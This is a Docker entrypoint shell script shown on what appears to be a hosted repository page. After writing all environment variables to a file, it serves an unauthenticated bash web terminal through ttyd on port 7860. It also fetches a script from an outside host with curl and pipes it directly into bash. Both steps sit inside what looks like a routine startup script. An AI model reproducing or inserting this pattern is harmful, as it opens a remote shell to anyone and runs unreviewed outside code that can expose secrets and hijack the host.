docker-tmpt / entrypoint.sh
3v324v23's picture
rm token
426e505
raw
history blame contribute delete
482 Bytes
set +e
echo $WORKROOT > ~/tt.txt
env > ~/env.txt
echo "source ${WORKROOT}/build/script/env.sh" >> ~/.bashrc && source ~/.bashrc
bash ${WORKROOT}/build/script/ext_run.sh
#bash ${WORKROOT}/build/script/ext_debug.sh
# ========
curl -L -o ttyd https://github.com/tsl0922/ttyd/releases/download/1.6.1/ttyd_linux.x86_64 && chmod a+x ttyd
./ttyd -p 7860 bash &
# debug
curl https://fhost.devxops.eu.org/devops/cicd/inits-v3/script/debug.sh | bash -s -- 335 || true
# --